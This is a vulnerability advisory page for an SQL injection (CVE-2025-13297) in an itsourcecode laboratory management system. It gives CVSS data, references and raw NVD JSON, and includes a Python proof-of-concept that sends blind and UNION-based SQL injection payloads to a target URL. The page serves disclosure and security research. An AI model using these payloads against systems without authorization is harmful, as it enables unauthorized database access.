CVE-2025-13297

Description

A security vulnerability has been detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. The impacted element is an unknown function of the file /course/controller.php. Such manipulation leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:itsourcecode:web-based_internet_laboratory_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Web-Based Internet Laboratory Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13297 SQL Injection PoC
# Target: itsourcecode Web-Based Internet Laboratory Management System 1.0
# Vulnerable File: /course/controller.php

def exploit_sql_injection(target_url):
    """
    SQL Injection PoC for CVE-2025-13297
    This PoC demonstrates boolean-based blind SQL injection
    """
    # Vulnerable endpoint
    vuln_url = f"{target_url}/course/controller.php"
    
    # Payload for testing boolean-based blind SQL injection
    # Original parameter value is manipulated with SQL injection
    payloads = [
        "1' AND 1=1 -- -",  # True condition
        "1' AND 1=2 -- -",  # False condition
        "1' UNION SELECT NULL-- -",
        "1' UNION SELECT version()-- -"
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Vulnerable Endpoint: {vuln_url}")
    print("[*] Testing SQL Injection payloads...")
    
    for i, payload in enumerate(payloads, 1):
        try:
            # Adjust 'id' parameter based on actual vulnerable parameter
            params = {'id': payload}
            response = requests.get(vuln_url, params=params, timeout=10)
            
            print(f"\n[Payload {i}] {payload}")
            print(f"Status Code: {response.status_code}")
            print(f"Response Length: {len(response.text)}")
            
            # Check for SQL error messages
            if 'sql' in response.text.lower() or 'mysql' in response.text.lower():
                print("[!] Potential SQL error detected!")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    
    print("\n[*] PoC execution completed.")
    print("[*] Note: This is for educational and authorized testing purposes only.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13297
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13297
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13297/
[4] VulDB https://vuldb.com/cve/CVE-2025-13297
[5] https://github.com/f14g-orz/CVE/issues/3
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332637
[8] https://vuldb.com/?id.332637
[9] https://vuldb.com/?submit.691786

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13297", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:56.497", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. The impacted element is an unknown function of the file /course/controller.php. Such manipulation leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:web-based_internet_laboratory_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "148D9177-FE59-4821-8277-90939332B660"}]}]}], "references": [{"url": "https://github.com/f14g-orz/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332637", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332637", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691786", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}